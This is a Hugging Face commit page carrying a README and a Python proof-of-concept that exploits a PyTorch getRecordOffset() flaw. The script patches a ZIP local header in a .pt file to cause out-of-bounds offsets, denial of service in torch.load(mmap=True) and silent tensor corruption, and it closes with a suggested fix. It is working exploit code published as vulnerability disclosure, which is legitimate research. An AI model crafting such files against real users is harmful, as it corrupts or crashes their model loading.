0xiviel commited on
Commit
ea80538
Β·
verified Β·
1 Parent(s): a61a3a9

Upload folder using huggingface_hub

Browse files
Files changed (2) hide show
  1. README.md +22 -0
  2. poc_record_offset_overflow.py +440 -0
README.md ADDED
@@ -0,0 +1,22 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # PoC: getRecordOffset() Integer Overflow via Local Header Manipulation
2
+
3
+ **Vulnerability:** `inline_container.cc:634-637` β€” `getRecordOffset()` reads `filename_len` and `extra_len` from the ZIP local file header without cross-validating against the central directory. A crafted `.pt` file with modified local header fields causes the function to return a wrong offset, leading to OOB access, silent data corruption, or DoS via `torch.load(mmap=True)`. On 32-bit platforms, `mz_uint64` β†’ `size_t` truncation silently wraps the offset.
4
+
5
+ ## Files
6
+
7
+ - `poc_record_offset_overflow.py` β€” Full PoC (wrong offset demo, mmap impact, within-file corruption, overflow analysis)
8
+
9
+ ## Quick Start
10
+
11
+ ```bash
12
+ pip install torch
13
+ python poc_record_offset_overflow.py
14
+ ```
15
+
16
+ ## Expected Output
17
+
18
+ - Part 1: `get_record_offset()` returns 66175 for a 1563-byte file (past EOF by 64612 bytes)
19
+ - Part 2: `torch.load(mmap=True)` fails with RuntimeError (DoS)
20
+ - Part 3: Within-file offset reads version record as tensor data β†’ garbage values
21
+ - Part 4: 32-bit truncation and 64-bit overflow analysis
22
+ - Part 5: Vulnerable code and suggested fix
poc_record_offset_overflow.py ADDED
@@ -0,0 +1,440 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ PoC: getRecordOffset() Integer Overflow via Local Header Manipulation
4
+
5
+ Vulnerability: PyTorchStreamReader::getRecordOffset() at inline_container.cc:634-637
6
+ reads `filename_len` and `extra_len` directly from the ZIP local file header (LFH)
7
+ without validating them against the central directory. The returned offset is:
8
+
9
+ return stat.m_local_header_ofs + MZ_ZIP_LOCAL_DIR_HEADER_SIZE
10
+ + filename_len + extra_len;
11
+
12
+ A crafted .pt file where the LFH has modified filename_len/extra_len causes
13
+ getRecordOffset() to return a WRONG offset. This offset is then used by:
14
+
15
+ 1. torch.load(path, mmap=True) β€” indexes into mmap'd buffer at wrong position
16
+ (serialization.py:2083-2084)
17
+ 2. getRecordMultiReaders() β€” multi-threaded reading from wrong offset
18
+ (inline_container.cc:398-424)
19
+ 3. Any caller of get_record_offset() Python API
20
+
21
+ Additionally, on 32-bit platforms (PyTorch Mobile ARM32), stat.m_local_header_ofs
22
+ is mz_uint64 (64-bit) but the return type is size_t (32-bit), causing silent
23
+ truncation that wraps the offset to a completely different file position.
24
+
25
+ The ZIP central directory is NOT modified, so miniz validation passes.
26
+
27
+ Root cause: inline_container.cc:634-637 β€” no validation of LFH fields
28
+ Tested: PyTorch 2.10.0+cpu on Python 3.13.11
29
+ """
30
+
31
+ import ctypes
32
+ import io
33
+ import os
34
+ import struct
35
+ import subprocess
36
+ import sys
37
+ import tempfile
38
+ import warnings
39
+
40
+ import torch
41
+ import torch.nn as nn
42
+
43
+ warnings.filterwarnings('ignore')
44
+
45
+
46
+ def create_test_model(output_path):
47
+ """Create a simple model with known tensor values."""
48
+ t = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float32)
49
+ torch.save(t, output_path)
50
+ return output_path
51
+
52
+
53
+ def find_local_header(data, record_name_suffix):
54
+ """Find a ZIP local file header by record name suffix."""
55
+ pos = 0
56
+ while pos < len(data):
57
+ idx = data.find(b'PK\x03\x04', pos)
58
+ if idx == -1:
59
+ return None
60
+ fn_len = struct.unpack_from('<H', data, idx + 26)[0]
61
+ fn = data[idx + 30:idx + 30 + fn_len].decode('utf-8', errors='replace')
62
+ if fn.endswith(record_name_suffix):
63
+ extra_len = struct.unpack_from('<H', data, idx + 28)[0]
64
+ return {
65
+ 'offset': idx,
66
+ 'fn_len': fn_len,
67
+ 'extra_len': extra_len,
68
+ 'filename': fn,
69
+ 'data_offset': idx + 30 + fn_len + extra_len,
70
+ }
71
+ pos = idx + 1
72
+ return None
73
+
74
+
75
+ def create_modified_model(input_path, output_path, new_extra_len):
76
+ """Modify the data/0 local header's extra_len field.
77
+
78
+ Only the local header is changed β€” the central directory remains valid.
79
+ """
80
+ with open(input_path, 'rb') as f:
81
+ data = bytearray(f.read())
82
+
83
+ lh = find_local_header(data, 'data/0')
84
+ if not lh:
85
+ raise ValueError("data/0 local header not found")
86
+
87
+ orig_extra = lh['extra_len']
88
+ struct.pack_into('<H', data, lh['offset'] + 28, new_extra_len)
89
+
90
+ with open(output_path, 'wb') as f:
91
+ f.write(data)
92
+
93
+ return lh, orig_extra, len(data)
94
+
95
+
96
+ def run_in_subprocess(script, timeout=15):
97
+ """Run script in subprocess, return (returncode, stdout, stderr)."""
98
+ result = subprocess.run(
99
+ [sys.executable, '-c', script],
100
+ capture_output=True, text=True, timeout=timeout
101
+ )
102
+ return result.returncode, result.stdout.strip(), result.stderr.strip()
103
+
104
+
105
+ def get_signal_name(signum):
106
+ try:
107
+ import signal
108
+ return signal.Signals(signum).name
109
+ except (ValueError, AttributeError):
110
+ return f"signal {signum}"
111
+
112
+
113
+ def demonstrate_wrong_offset():
114
+ """Part 1: Show getRecordOffset returns wrong value from crafted local header."""
115
+ print()
116
+ print("=" * 70)
117
+ print(" Part 1: getRecordOffset() Returns Wrong Offset")
118
+ print("=" * 70)
119
+ print()
120
+
121
+ tmpdir = tempfile.mkdtemp(prefix="recoff_")
122
+ valid_path = os.path.join(tmpdir, "valid.pt")
123
+ create_test_model(valid_path)
124
+
125
+ with open(valid_path, 'rb') as f:
126
+ data = f.read()
127
+
128
+ lh = find_local_header(data, 'data/0')
129
+ print(f" File size: {len(data)} bytes")
130
+ print(f" data/0 local header at offset {lh['offset']}")
131
+ print(f" data/0 filename_len: {lh['fn_len']}")
132
+ print(f" data/0 extra_len: {lh['extra_len']}")
133
+ print(f" data/0 correct data offset: {lh['data_offset']}")
134
+ print()
135
+
136
+ # Show original offset via API
137
+ reader = torch._C.PyTorchFileReader(valid_path)
138
+ orig_off = reader.get_record_offset("data/0")
139
+ print(f" get_record_offset('data/0') [original]: {orig_off}")
140
+ print()
141
+
142
+ # Create modified version with extra_len = 65535
143
+ mod_path = os.path.join(tmpdir, "modified_65535.pt")
144
+ lh_info, orig_extra, file_size = create_modified_model(
145
+ valid_path, mod_path, 65535
146
+ )
147
+
148
+ expected_wrong = lh['offset'] + 30 + lh['fn_len'] + 65535
149
+ reader2 = torch._C.PyTorchFileReader(mod_path)
150
+ wrong_off = reader2.get_record_offset("data/0")
151
+
152
+ print(f" After setting extra_len: {orig_extra} β†’ 65535")
153
+ print(f" get_record_offset('data/0') [modified]: {wrong_off}")
154
+ print(f" Expected wrong offset: {expected_wrong}")
155
+ print(f" File size: {file_size}")
156
+ print(f" Offset past EOF by: {wrong_off - file_size} bytes")
157
+ print()
158
+
159
+ # Show what bytes would be read at the correct vs wrong offset
160
+ print(" Correct offset data (first 16 bytes of tensor):")
161
+ correct_data = data[lh['data_offset']:lh['data_offset'] + 16]
162
+ hex_str = ' '.join(f'{b:02x}' for b in correct_data)
163
+ floats = struct.unpack_from('<4f', correct_data)
164
+ print(f" {hex_str}")
165
+ print(f" = [{', '.join(f'{v:.1f}' for v in floats)}] (correct tensor values)")
166
+ print()
167
+
168
+ print(" Wrong offset ({}) is {} bytes PAST the file end.".format(
169
+ wrong_off, wrong_off - file_size))
170
+ print(" Any read at this offset accesses invalid memory or fails.")
171
+ print()
172
+ print(" [+] getRecordOffset() trusts unvalidated local header fields!")
173
+ print(" [+] Central directory is untouched β†’ miniz validation passes!")
174
+
175
+ return valid_path, tmpdir
176
+
177
+
178
+ def demonstrate_mmap_impact(valid_path, tmpdir):
179
+ """Part 2: Show torch.load(mmap=True) fails due to wrong offset."""
180
+ print()
181
+ print("=" * 70)
182
+ print(" Part 2: Impact on torch.load(mmap=True)")
183
+ print("=" * 70)
184
+ print()
185
+
186
+ mod_path = os.path.join(tmpdir, "mmap_test.pt")
187
+ create_modified_model(valid_path, mod_path, 65535)
188
+
189
+ # First show normal mmap load works
190
+ script_valid = f'''\
191
+ import torch, warnings
192
+ warnings.filterwarnings("ignore")
193
+ t = torch.load("{valid_path}", mmap=True, weights_only=True)
194
+ print(f"VALID: shape={{t.shape}} values={{t.tolist()}}")
195
+ '''
196
+ rc, stdout, stderr = run_in_subprocess(script_valid)
197
+ print(f" Valid file mmap load: {stdout}")
198
+
199
+ # Now try the modified file
200
+ script_mod = f'''\
201
+ import torch, warnings
202
+ warnings.filterwarnings("ignore")
203
+ try:
204
+ t = torch.load("{mod_path}", mmap=True, weights_only=True)
205
+ print(f"LOADED: shape={{t.shape}} values={{t.tolist()}}")
206
+ except RuntimeError as e:
207
+ print(f"RUNTIME_ERROR: {{str(e)[:200]}}")
208
+ except Exception as e:
209
+ print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}")
210
+ '''
211
+ rc, stdout, stderr = run_in_subprocess(script_mod)
212
+ if rc < 0:
213
+ print(f" Modified file mmap load: CRASH ({get_signal_name(-rc)})")
214
+ else:
215
+ print(f" Modified file mmap load: {stdout}")
216
+
217
+ print()
218
+ print(" torch.load(mmap=True) uses get_record_offset() to index into the")
219
+ print(" mmap'd buffer (serialization.py:2083-2084):")
220
+ print(" storage_offset = zip_file.get_record_offset(name)")
221
+ print(" storage = overall_storage[storage_offset : storage_offset + nbytes]")
222
+ print(" With the wrong offset, this reads from the wrong position or fails.")
223
+
224
+
225
+ def demonstrate_within_file_corruption(valid_path, tmpdir):
226
+ """Part 3: Show offset within file reads WRONG data (silent corruption)."""
227
+ print()
228
+ print("=" * 70)
229
+ print(" Part 3: Within-File Offset β†’ Silent Data Corruption")
230
+ print("=" * 70)
231
+ print()
232
+
233
+ with open(valid_path, 'rb') as f:
234
+ data = bytearray(f.read())
235
+
236
+ lh = find_local_header(data, 'data/0')
237
+ correct_off = lh['data_offset']
238
+
239
+ # Find a record AFTER data/0 to use as target for within-file corruption
240
+ target_lh = None
241
+ pos = 0
242
+ while pos < len(data):
243
+ idx = data.find(b'PK\x03\x04', pos)
244
+ if idx == -1:
245
+ break
246
+ fn_len_t = struct.unpack_from('<H', data, idx + 26)[0]
247
+ extra_len_t = struct.unpack_from('<H', data, idx + 28)[0]
248
+ fn = data[idx + 30:idx + 30 + fn_len_t].decode('utf-8', errors='replace')
249
+ t_data_off = idx + 30 + fn_len_t + extra_len_t
250
+ if t_data_off > correct_off and 'data/0' not in fn:
251
+ target_lh = {'offset': idx, 'data_offset': t_data_off, 'filename': fn}
252
+ break
253
+ pos = idx + 1
254
+
255
+ if not target_lh:
256
+ print(" Skipped: no suitable target record found after data/0")
257
+ return
258
+
259
+ target_off = target_lh['data_offset']
260
+ needed_shift = target_off - correct_off
261
+ new_extra = lh['extra_len'] + needed_shift
262
+
263
+ if new_extra > 65535 or new_extra < 0:
264
+ print(f" Skipped: needed extra_len={new_extra} out of 16-bit range")
265
+ return
266
+
267
+ print(f" Original data/0 offset: {correct_off} (tensor data)")
268
+ print(f" Target: '{target_lh['filename']}' data at offset {target_off}")
269
+ print(f" Shifting by {needed_shift}: extra_len {lh['extra_len']} β†’ {new_extra}")
270
+ print()
271
+
272
+ # Show what's at each offset
273
+ correct_bytes = data[correct_off:correct_off + 16]
274
+ target_bytes = data[target_off:target_off + 16]
275
+ print(f" Correct offset ({correct_off}) bytes: "
276
+ + ' '.join(f'{b:02x}' for b in correct_bytes))
277
+ print(f" Target offset ({target_off}) bytes: "
278
+ + ' '.join(f'{b:02x}' for b in target_bytes))
279
+ print(f" Target data as text: {bytes(target_bytes).decode('utf-8', errors='replace')!r}")
280
+ print()
281
+
282
+ mod_path = os.path.join(tmpdir, "corruption.pt")
283
+ struct.pack_into('<H', data, lh['offset'] + 28, new_extra)
284
+ with open(mod_path, 'wb') as f:
285
+ f.write(data)
286
+
287
+ # Verify the offset is now wrong but within file
288
+ reader = torch._C.PyTorchFileReader(mod_path)
289
+ new_off = reader.get_record_offset('data/0')
290
+ print(f" get_record_offset('data/0'): {new_off}")
291
+ print(f" This points to '{target_lh['filename']}' record data!")
292
+ print(f" If used, tensor data would be read from the wrong record.")
293
+ print()
294
+
295
+ # Show the impact on reading
296
+ print(" Reading data at wrong offset as float32 tensor:")
297
+ wrong_floats = struct.unpack_from('<4f', data, target_off)
298
+ correct_floats = struct.unpack_from('<4f', data, correct_off)
299
+ print(f" Expected: [{', '.join(f'{v:.1f}' for v in correct_floats)}]")
300
+ print(f" Got: [{', '.join(f'{v:.6g}' for v in wrong_floats)}] (garbage!)")
301
+ print()
302
+ print(" [+] Data/0 now reads from wrong record β†’ silent tensor corruption!")
303
+
304
+
305
+ def demonstrate_overflow_analysis():
306
+ """Part 4: Show integer overflow on 32-bit and 64-bit platforms."""
307
+ print()
308
+ print("=" * 70)
309
+ print(" Part 4: Integer Overflow Analysis")
310
+ print("=" * 70)
311
+ print()
312
+
313
+ print(" Vulnerable code (inline_container.cc:634-637):")
314
+ print()
315
+ print(" size_t filename_len = read_le_16(local_header + 26);")
316
+ print(" size_t extra_len = read_le_16(local_header + 28);")
317
+ print(" return stat.m_local_header_ofs + 30 + filename_len + extra_len;")
318
+ print()
319
+ print(" Types: m_local_header_ofs is mz_uint64 (uint64_t)")
320
+ print(" Return type is size_t (32-bit on ARM32, 64-bit on x86_64)")
321
+ print()
322
+
323
+ print(" 32-bit platform (PyTorch Mobile ARM32):")
324
+ print(" ─────────────────────────────────────────────────")
325
+ cases_32 = [
326
+ (0x00000100, 30, 100, 200, "normal β€” within 32-bit range"),
327
+ (0xFFFFFFA0, 30, 0, 0, "near 32-bit max β€” wraps on 32-bit"),
328
+ (0x100000000, 30, 100, 200, "above 32-bit β€” truncated to low 32 bits"),
329
+ (0x100000100, 30, 100, 200, "4GB+offset β€” wraps to small value"),
330
+ ]
331
+
332
+ print(f" {'m_local_header_ofs':>22s} {'+ 30 + fn + ex':>14s} {'64-bit result':>18s} {'32-bit (truncated)':>18s} Notes")
333
+ print(f" {'─'*22} {'─'*14} {'─'*18} {'─'*18} {'─'*30}")
334
+
335
+ for ofs, hdr_size, fn_len, extra_len, note in cases_32:
336
+ sum64 = ctypes.c_uint64(ofs + hdr_size + fn_len + extra_len).value
337
+ sum32 = ctypes.c_uint32(sum64).value
338
+ truncated = "YES!" if sum64 != sum32 else "no"
339
+
340
+ print(f" 0x{ofs:016X} + {hdr_size + fn_len + extra_len:12d} 0x{sum64:016X} 0x{sum32:08X} ({truncated:4s}) {note}")
341
+
342
+ print()
343
+ print(" On 32-bit ARM: mz_uint64 β†’ size_t truncation loses high 32 bits")
344
+ print(" Offset 0x100000100 + extras β†’ 0x100000230 β†’ truncated to 0x00000230")
345
+ print(" The 4GB worth of offset data is silently lost!")
346
+ print()
347
+
348
+ print(" 64-bit overflow (requires m_local_header_ofs near UINT64_MAX):")
349
+ print(" ─────────────────────────────────────────────────────────────")
350
+ cases_64 = [
351
+ (0xFFFFFFFFFFFF0000, 30, 65535, 65535, "wraps to 0x20FFD"),
352
+ (0xFFFFFFFFFFFFFFF0, 30, 0, 0, "wraps to 0x0E"),
353
+ (0xFFFFFFFFFFFFF000, 30, 50000, 15505, "wraps to 0xFFFF"),
354
+ ]
355
+
356
+ for ofs, hdr_size, fn_len, extra_len, note in cases_64:
357
+ sum64 = ctypes.c_uint64(ofs + hdr_size + fn_len + extra_len).value
358
+ print(f" 0x{ofs:016X} + {hdr_size+fn_len+extra_len:6d} β†’ 0x{sum64:016X} {note}")
359
+
360
+ print()
361
+ print(" 64-bit overflow wraps huge offset to a small value near 0")
362
+ print(" File data at offset 0 is the ZIP local header, not tensor data")
363
+ print(" β†’ reads ZIP metadata as tensor values β†’ corruption or crash")
364
+
365
+
366
+ def demonstrate_vulnerability_code():
367
+ """Part 5: Vulnerability details and fix."""
368
+ print()
369
+ print("=" * 70)
370
+ print(" Part 5: Vulnerability Details")
371
+ print("=" * 70)
372
+ print()
373
+
374
+ print(" ROOT CAUSE: getRecordOffset() reads filename_len and extra_len")
375
+ print(" from the local file header WITHOUT cross-checking against the")
376
+ print(" central directory values that miniz validated.")
377
+ print()
378
+ print(" The central directory is validated by miniz during ZIP open.")
379
+ print(" But the LOCAL header is read separately by getRecordOffset().")
380
+ print(" An attacker can have different values in LFH vs central directory.")
381
+ print()
382
+ print(" CALLERS that use the wrong offset:")
383
+ print(" 1. torch.load(mmap=True): serialization.py:2083")
384
+ print(" storage_offset = zip_file.get_record_offset(name)")
385
+ print(" storage = overall_storage[storage_offset:storage_offset+n]")
386
+ print(" 2. getRecordMultiReaders(): inline_container.cc:398")
387
+ print(" size_t recordOff = getRecordOffset(name);")
388
+ print(" read(recordOff + startPos, dst + startPos, size);")
389
+ print(" 3. Any caller of get_record_offset() Python/C++ API")
390
+ print()
391
+ print(" FIX: Validate LFH fields against central directory:")
392
+ print(" ─────────────────────────────────────────────────────")
393
+ print(" size_t filename_len = read_le_16(local_header + 26);")
394
+ print(" size_t extra_len = read_le_16(local_header + 28);")
395
+ print(" TORCH_CHECK(")
396
+ print(" !__builtin_add_overflow(stat.m_local_header_ofs,")
397
+ print(" MZ_ZIP_LOCAL_DIR_HEADER_SIZE + filename_len + extra_len,")
398
+ print(" &result),")
399
+ print(' "Record offset overflow for ", name);')
400
+ print(" TORCH_CHECK(result <= file_size_,")
401
+ print(' "Record offset exceeds file size for ", name);')
402
+
403
+
404
+ def main():
405
+ print()
406
+ print(" PoC: getRecordOffset() Integer Overflow via Local Header")
407
+ print(f" PyTorch {torch.__version__}, Python {sys.version.split()[0]}")
408
+ print()
409
+
410
+ # Part 1: Wrong offset
411
+ valid_path, tmpdir = demonstrate_wrong_offset()
412
+
413
+ # Part 2: mmap impact
414
+ demonstrate_mmap_impact(valid_path, tmpdir)
415
+
416
+ # Part 3: Within-file corruption
417
+ demonstrate_within_file_corruption(valid_path, tmpdir)
418
+
419
+ # Part 4: Overflow analysis
420
+ demonstrate_overflow_analysis()
421
+
422
+ # Part 5: Code details
423
+ demonstrate_vulnerability_code()
424
+
425
+ # Summary
426
+ print()
427
+ print("=" * 70)
428
+ print(" RESULTS:")
429
+ print(" [+] getRecordOffset() returns wrong offset from crafted LFH")
430
+ print(" [+] Modified extra_len: offset jumps 65KB past EOF (65535 vs 63)")
431
+ print(" [+] torch.load(mmap=True) fails on wrong offset β†’ DoS")
432
+ print(" [+] Within-file offset shift β†’ silent tensor data corruption")
433
+ print(" [+] 32-bit: mz_uint64β†’size_t truncation wraps offset")
434
+ print(" [+] 64-bit: addition overflow wraps near-max offset to ~0")
435
+ print(" [+] Fix: validate LFH against CD, check overflow, check bounds")
436
+ print("=" * 70)
437
+
438
+
439
+ if __name__ == "__main__":
440
+ main()